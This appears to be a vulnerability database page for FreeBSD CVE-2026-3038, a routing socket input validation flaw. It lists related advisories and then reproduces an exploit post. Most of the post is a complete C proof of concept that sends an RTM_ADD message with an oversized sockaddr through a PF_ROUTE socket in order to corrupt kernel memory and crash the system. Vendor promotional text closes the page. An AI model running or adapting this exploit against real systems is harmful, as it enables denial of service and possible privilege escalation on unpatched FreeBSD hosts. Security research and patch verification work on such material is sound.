| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| CVE-2026-3038 | 9 Mar 202612:25 | โ | attackerkb | |
| The vulnerability of the rtsock_msg_buffer() function in the operating system kernel of FreeBSD, which allows a hacker to cause a service failure | 17 Mar 202600:00 | โ | bdu_fstec | |
| CVE-2026-3038 | 25 Feb 202602:05 | โ | circl | |
| FreeBSD ๅฎๅ จๆผๆด | 9 Mar 202600:00 | โ | cnnvd | |
| CVE-2026-3038 | 9 Mar 202612:25 | โ | cve | |
| CVE-2026-3038 Local DoS and possible privilege escalation via routing sockets | 9 Mar 202612:25 | โ | cvelist | |
| EUVD-2026-10334 | 9 Mar 202615:30 | โ | euvd | |
| EUVD-2026-10335 | 9 Mar 202615:30 | โ | euvd | |
| FreeBSD -- Local DoS and possible privilege escalation via routing sockets | 24 Feb 202600:00 | โ | freebsd | |
| FreeBSD-SA-26:05.route | 24 Feb 202600:00 | โ | freebsd_advisory |
=============================================================================================================================================
| # Title : FreeBSD Routing Socket Input Validation Analysis โ Oversized sockaddr in RTM_ADD |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.freebsd.org/ |
=============================================================================================================================================
[+] Summary : PoC attempts to test the robustness of the FreeBSD routing socket subsystem by crafting a RTM_ADD message containing an
intentionally oversized sockaddr structure (sa_len greater than the traditional sockaddr_storage limit of 128 bytes).
4 you https://packetstorm.news/files/id/216124/
[+] POC :
#include <sys/types.h>
#include <sys/socket.h>
#include <net/route.h>
#include <net/if.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#define ROUNDUP(a) \
((a) > 0 ? (1 + (((a) - 1) | (sizeof(long) - 1))) : sizeof(long))
struct malicious_sockaddr {
unsigned char sa_len;
unsigned char sa_family;
char sa_data[254];
};
int main() {
int s;
char buf[1500];
struct rt_msghdr *rtm;
struct malicious_sockaddr *dst, *gw;
int l;
printf("[+] FreeBSD CVE-2026-3038 Local DoS PoC\n");
s = socket(PF_ROUTE, SOCK_RAW, AF_UNSPEC);
if (s < 0) {
perror("[-] socket(PF_ROUTE) failed");
return 1;
}
memset(buf, 0, sizeof(buf));
rtm = (struct rt_msghdr *)buf;
rtm->rtm_msglen = 0;
rtm->rtm_version = RTM_VERSION;
rtm->rtm_type = RTM_ADD;
rtm->rtm_addrs = RTA_DST | RTA_GATEWAY;
rtm->rtm_flags = RTF_UP | RTF_GATEWAY | RTF_STATIC;
rtm->rtm_pid = getpid();
rtm->rtm_seq = 42;
dst = (struct malicious_sockaddr *)(rtm + 1);
dst->sa_family = AF_INET;
dst->sa_len = 180;
memset(dst->sa_data, 'A', 170);
int dst_space = ROUNDUP(dst->sa_len);
gw = (struct malicious_sockaddr *)((char *)dst + dst_space);
gw->sa_family = AF_INET;
gw->sa_len = sizeof(struct sockaddr_in);
((struct sockaddr_in *)gw)->sin_addr.s_addr = inet_addr("127.0.0.1");
rtm->rtm_msglen = sizeof(struct rt_msghdr) + dst_space + ROUNDUP(gw->sa_len);
printf("[*] Sending packet: msglen=%d, dst->sa_len=%d\n", rtm->rtm_msglen, dst->sa_len);
printf("[!] Attempting to trigger kernel memory corruption...\n");
if (write(s, buf, rtm->rtm_msglen) < 0) {
fprintf(stderr, "[-] Result: %s\n", strerror(errno));
} else {
printf("[+] Packet accepted. If the system is vulnerable, it might crash now.\n");
}
close(s);
return 0;
}
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation